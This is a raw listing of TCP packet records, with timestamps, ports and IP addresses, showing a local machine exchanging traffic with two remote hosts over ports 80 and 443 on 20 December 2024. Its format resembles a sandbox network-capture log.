Dec 20, 2024 16:34:51.256956100 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.257049084 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.261132956 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.261147022 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.261198997 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.261221886 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.265741110 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.265759945 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.265824080 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.270306110 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.270386934 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.270421982 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.270483017 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.273958921 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.274044037 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.274215937 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.274308920 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.277601004 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.277698040 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.278052092 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.278162003 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.281270981 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.281342030 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.281605005 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.281678915 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.405198097 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.405236006 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.405422926 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.405971050 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.406018019 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.406085014 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.406100988 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.406162024 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.408865929 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.408997059 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.409018040 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.409063101 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.411807060 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.411885977 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.411916018 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.412002087 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.414740086 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.414822102 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.414843082 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.414890051 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.417506933 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.417726994 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.418066025 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.418132067 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.420456886 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.420537949 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.420758963 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.420929909 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.423330069 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.423418045 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.423544884 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.423683882 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.426166058 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.426178932 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.426279068 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.429100990 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.429121017 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.429173946 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.429260969 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.431940079 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.431952953 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.432039022 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.432064056 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.434640884 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.434659004 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.434730053 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.437551975 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.437563896 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.437649012 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.440448999 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.440460920 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.440525055 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.440583944 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.443257093 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.443330050 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.443635941 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.443702936 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.446191072 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.446290016 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.446340084 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.446340084 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.449045897 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.449126005 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.449471951 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.449563026 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.451893091 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.452011108 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.452197075 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.452428102 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.454777002 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.454797983 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.454857111 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.454857111 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.457695961 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.457767010 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.458005905 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.458277941 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.460644960 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.460705996 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.460943937 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.460999012 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.463736057 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.463747978 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.463838100 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.598556042 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.598768950 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.598925114 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.598984003 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.600014925 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.600078106 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.600421906 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.600471020 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.602750063 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.602900028 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.602948904 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.602948904 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.605596066 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.605671883 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.605707884 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.605756044 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.608372927 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.608527899 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.608583927 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.608583927 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.611252069 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.611346006 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.611413002 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.611413002 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.614164114 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.614245892 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.614526987 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.614634037 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.616878986 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.616951942 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.617322922 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.617374897 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.619705915 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.619769096 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.619811058 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.619870901 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.622526884 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.622539997 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.622590065 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.625731945 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.625791073 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.625885010 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.625935078 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.628202915 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.628283024 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.628318071 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.628429890 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.630975008 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.631086111 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.631367922 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.631428003 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.633878946 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.633891106 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.634004116 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.636719942 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.636732101 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.636867046 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.639544010 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.639621019 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.639925003 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.639986992 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.642433882 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.642447948 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.642518044 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.645351887 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.645365000 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.645464897 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.648087978 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.648241997 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.648416996 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.648484945 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.650963068 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.651031017 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.651066065 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.651103973 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.653688908 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.653764963 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.654059887 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.654110909 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.656512976 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.656524897 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.656933069 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.659369946 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.659382105 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.659703970 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.662386894 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.662400007 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.662506104 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.665062904 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.665175915 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.666601896 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.666659117 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.668221951 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.668288946 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.668320894 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.668400049 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.670926094 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.671006918 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.671694040 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.671752930 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.673648119 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.673707962 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.673901081 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.673939943 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.676383972 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.676508904 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.676662922 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.676719904 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.679307938 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.679392099 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.679418087 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.679467916 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.682281017 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.682463884 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.683259964 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.683331966 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.685185909 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.685431004 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.685689926 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.685777903 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.687798023 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.687921047 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.688183069 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.688234091 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:55.836719990 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:55.836797953 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:56.310599089 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:56.310628891 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:56.310827971 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:56.572730064 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:56.572751999 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:56.693820000 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:57.794523954 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:57.795331955 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:57.800497055 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:57.800509930 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:57.800812006 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:57.821162939 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:57.867327929 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.471611023 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.471808910 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.471847057 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.472044945 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.472090006 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.472152948 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.472275019 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.478503942 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.478605032 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.478626013 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.486663103 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.486831903 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.486860991 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.498140097 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.498318911 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.498331070 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.540457964 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.540483952 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.587352037 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.660695076 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.664742947 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.664830923 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.664844990 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.672631025 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.672718048 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.672728062 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.680834055 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.680923939 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.680937052 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.688812971 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.688898087 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.688909054 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.696983099 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.697093964 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.697113037 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.704830885 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.704922915 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.704935074 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.713099957 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.713327885 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.713345051 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.721729040 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.721921921 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.721935034 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.729192972 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.729374886 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.729396105 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.736445904 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.736587048 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.736614943 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.790546894 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.790575027 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.838012934 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.852797031 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.855166912 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.855262995 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.855283022 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.887893915 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.887906075 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.887945890 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.887965918 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.887974024 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.888210058 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.888210058 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.888233900 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.888250113 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.888293982 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.914104939 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.914144993 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.914165020 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.914216042 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.914233923 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.914252996 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.914459944 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.914459944 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.914489031 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.944667101 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.944722891 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.944749117 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.944762945 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.944777012 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.944802046 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:58.944828987 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:58.993726969 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:59.066183090 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:59.066206932 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:59.066246986 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:59.066262960 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:59.066293001 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:59.066293001 CET	49731	443	192.168.2.4	151.101.1.137
Dec 20, 2024 16:34:59.066317081 CET	443	49731	151.101.1.137	192.168.2.4
Dec 20, 2024 16:34:59.066370010 CET	49731	443	192.168.2.4	151.101.1.137
